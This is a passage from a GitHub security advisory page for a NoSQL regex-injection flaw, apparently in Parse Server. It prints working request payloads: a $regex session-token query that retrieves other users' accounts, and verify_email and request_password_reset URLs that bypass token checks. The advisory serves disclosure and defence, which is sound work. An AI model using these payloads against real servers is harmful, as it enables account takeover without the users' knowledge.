OSV 1.4.0 · github-reviewed · 修改于 2021-01-09 04:27
发布时间
2020-03-05 04:20
GitHub 审查时间
2020-03-05 03:54
NVD 发布时间
—
源文件
advisories/github-reviewed/2020/03/GHSA-h4mf-75hf-67w4/GHSA-h4mf-75hf-67w4.json
("_SessionToken":{"$regex":"r:027f"}} and find valid accounts this way.Using this method, it's possible to retrieve accounts without interaction from the users.
GET /parse/users/me HTTP/1.1
{
"_ApplicationId": "appName",
"_JavaScriptKey": "javascriptkey",
"_ClientVersion": "js2.10.0",
"_InstallationId": "ca713ee2-6e60-d023-a8fe-14e1bfb2f300",
"_SessionToken": {
"$regex": "r:5"
}
}
When trying it with an update query the same thing luckily doesn't seem to work: POST /parse/classes/_User/PPNk59jPPZ
If you sign up with someone else's email address, you can simply use regex in the token param to verify the account: http://localhost:1337/parse/apps/kickbox/verify_email?token[$regex]=a&[email protected]
The same thing can be done for reset password: http://localhost:1337/parse/apps/kickbox/request_password_reset?token[$regex]=a&[email protected]
You may need to do it a few times with a different letter/number, but as long as the tokens contain the character it will succeed.